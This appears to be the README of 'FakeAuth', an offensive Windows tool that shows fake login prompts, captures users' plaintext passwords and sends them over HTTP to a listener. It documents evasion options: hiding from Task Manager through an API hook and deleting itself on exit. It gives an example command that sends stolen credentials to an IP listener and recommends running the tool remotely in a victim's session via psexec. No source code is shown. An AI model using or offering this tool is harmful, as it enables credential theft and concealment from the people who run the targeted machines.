
Erstellt gefälschte Authentifizierungsabfrage, um Klartext-Passwörter von Benutzern zu erfassen
FakeAuth ist ein Tool, das nach Benutzeranmeldeinformationen fragt und diese über das HTTP-Protokoll exfiltriert.
Inspiriert von folgenden Projekten
Erwarten Sie schmutzigen Code und ein paar Fehler ;)
Keine speziellen Anforderungen
Usage: FakeAuth.exe <hide> <mode> <type> <count> <title> <message> <listener>
Example: FakeAuth.exe 1 1 1 10 window_title enter_creds 10.0.0.0:80\n
hide (integer) -> Hide Process in Taskmgr by WinAPI-Hook (0,1 - requires FakeAuth.dll)
mode (integer) -> Self-Delete at process stop (0,1) - .dll only possible if taskmgr closed!
type (integer) -> Prompt Style (1,2)
count (long) -> How many prompts after invalid Credentials (0,1,2,..,n 0=unlimited)
title (string) -> Prompt title (visible in type=1 only)
message (string) -> Window message
listener (string) -> HTTP exfiltration listener (10.0.0.0:80), if not specified print stdout
Am besten verwenden Sie das Tool auf einem entfernten Rechner in einer Benutzersitzung. (psexec oder andere Helfer)
@atn1ght1 Twitter